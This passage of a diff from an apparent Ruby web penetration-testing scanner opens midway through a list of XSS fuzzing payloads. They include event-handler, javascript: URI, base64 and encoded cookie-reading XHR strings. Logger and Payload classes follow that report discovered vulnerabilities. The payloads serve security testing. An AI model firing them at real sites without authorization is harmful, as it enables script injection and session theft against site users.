+ <svg/onload=alert(1)
144
+ <svg><script ?>alert(1)
145
+ <svg><script onlypossibleinopera:-)> alert(1)
146
+ <svg><script>//&NewLine;confirm(1);</script </svg>
147
+ <textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
148
+ <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
149
+ <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
150
+ <var onmouseover="prompt(1)">On Mouse Over</var>?
151
+ <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
152
+ alert
153
+ alert&lpar;1&rpar;
154
+ alert(1)
155
+ alert\\`1\\`
156
+ alert`1`
157
+ <script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
158
+ http://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
159
+ http://www.<script>alert(1)</script .com
160
+ https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/xss/test.xxe
161
+ javascript:alert%28/xss/%29
162
+ javascript:alert(1)
163
+ PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
164
+ x”</title><img src%3dx onerror%3dalert(1)>
@@ -0,0 +1,8 @@
1
+ # Workaround for Pairwise < v0.2.3
2
+ module Psych
3
+ module ENGINE
4
+ def self.yamler=(_)
5
+ # nop
6
+ end
7
+ end
8
+ end
@@ -0,0 +1,59 @@
1
+ require 'date'
2
+ require 'term/ansicolor'
3
+
4
+ module Pentest
5
+ module Logger
6
+ PADDING = ' ' * 10
7
+ MAX_WIDTH = 60
8
+
9
+ @@progress_counter = 0
10
+
11
+ class << self
12
+ def debug(text, timestamp: true)
13
+ puts "#{time(timestamp)} #{Term::ANSIColor.blue(text)}"
14
+ end
15
+
16
+ def info(text, timestamp: true)
17
+ puts "#{time(timestamp)} #{Term::ANSIColor.green(text)}"
18
+ end
19
+
20
+ def warn(text, timestamp: true)
21
+ puts "#{time(timestamp)} #{Term::ANSIColor.yellow(text)}"
22
+ end
23
+
24
+ def error(text, timestamp: true)
25
+ puts "#{time(timestamp)} #{Term::ANSIColor.red(text)}"
26
+ end
27
+
28
+ def time(enabled = true)
29
+ return PADDING unless enabled
30
+ now = Time.now
31
+ "[#{now.strftime("%H:%M:%S")}]"
32
+ end
33
+
34
+ def start_progress
35
+ print PADDING + ' '
36
+ @@progress_counter = 0
37
+ end
38
+
39
+ def put_progress(char)
40
+ if @@progress_counter + char.size > MAX_WIDTH
41
+ print "\n"
42
+ print PADDING + ' '
43
+ @@progress_counter = 0
44
+ end
45
+
46
+ print char
47
+ @@progress_counter += char.size
48
+ end
49
+
50
+ def end_progress
51
+ print "\n"
52
+ end
53
+
54
+ def print_seperator
55
+ print "\n"
56
+ end
57
+ end
58
+ end
59
+ end
@@ -0,0 +1,76 @@
1
+ require 'term/ansicolor'
2
+
3
+ module Pentest
4
+ class Payload
5
+ attr_accessor :params, :values, :penetration_confidence, :injection, :penetration_message, :penetration_type
6
+
7
+ def initialize(data = {})
8
+ @route = data.fetch(:route)
9
+ @params = data.fetch(:params, [])
10
+ @values = data.fetch(:values, [])
11
+ @injection = data.fetch(:injection, '')
12
+ @injection_point = data.fetch(:injection_point, nil)
13
+
14
+ @penetration_confidence = nil
15
+ @penetration_message = nil
16
+ @penetration_type = nil
17
+ end
18
+
19
+ def params_hash
20
+ @params.zip(@values).to_h
21
+ end
22
+
23
+ def to_s(index)
24
+ path_parameters = {}
25
+ query_parameters = []
26
+
27
+ vulnerability_name = @penetration_type.upcase
28
+ if @penetration_confidence == :preattack
29
+ vulnerability_name = "POSSIBLE #{vulnerability_name}"
30
+ end
31
+
32
+ lines = []
33
+
34
+ lines << Term::ANSIColor.red("#{index + 1}. #{vulnerability_name} FOUND")
35
+
36
+ lines << ''
37
+
38
+ lines << '=== Payload ==='
39
+
40
+ params_hash.each_with_index do |(param, value), index|
41
+ if @route.required_parts.include? param[0]
42
+ path_parameters[param[0]] = value
43
+ else
44
+ if @injection_point == index
45
+ if @penetration_confidence == :attack
46
+ query_parameters << [param, Term::ANSIColor.red(URI.encode(@injection))]
47
+ else
48
+ query_parameters << [param, Term::ANSIColor.red('[malicious payload]')]
49
+ end
50
+ else
51
+ query_parameters << [param, URI.encode(value)]
52
+ end
53
+ end
54
+ end
55
+
56
+ lines << "#{@route.verb} #{@route.format(path_parameters)}"
57
+
58
+ query_parameters.each_with_index do |(param, value), index|
59
+ key = if param.size == 1
60
+ param[0]
61
+ else
62
+ "#{param[0]}[#{param[1]}]"
63
+ end
64
+
65
+ lines << "#{' ' * @route.verb.size} #{index == 0 ? '?' : '&'}#{key}=#{value}"
66
+ end
67
+
68
+ lines << ''
69
+
70
+ lines << '=== Proof of Penetration ==='
71
+ lines << @penetration_message
72
+
73
+ lines.join("\n")
74
+ end
75
+ end
76
+ end